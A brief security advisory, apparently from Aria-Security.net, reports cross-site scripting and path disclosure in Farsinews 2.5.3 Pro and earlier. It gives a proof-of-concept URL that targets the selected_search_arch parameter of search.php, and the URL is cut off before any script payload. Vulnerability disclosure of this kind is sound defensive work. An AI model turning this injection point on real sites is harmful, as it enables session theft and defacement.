
Farsinews cross-site scripting & path disclosure vulnerability




#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
#Aria-Security.net Advisory
#Discovered  by:R@1D3N (amin emami)
# 
#Gr33t to:A.u.r.a  & O.u.t.l.a.w & Smok3r & behzad & majid and all Persian Security team
#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
» Software: Farsinews 2.5.3 Pro and below
» download Link: http://dl.farsinewsteam.com/?file=FarsiNews2.5.3Pro.zip
» Support Website: http://www.farsinewsteam.com/
» advisory: http://www.aria-security.net/advisory/farsinews/farsinews042006.txt

» Summary:
Farsinews is a powerful Persian news publishing system.



» Proof of Concept:
XSS attack:
http://[target]/[farsinews_path]/search.php?selected_search_arch=>
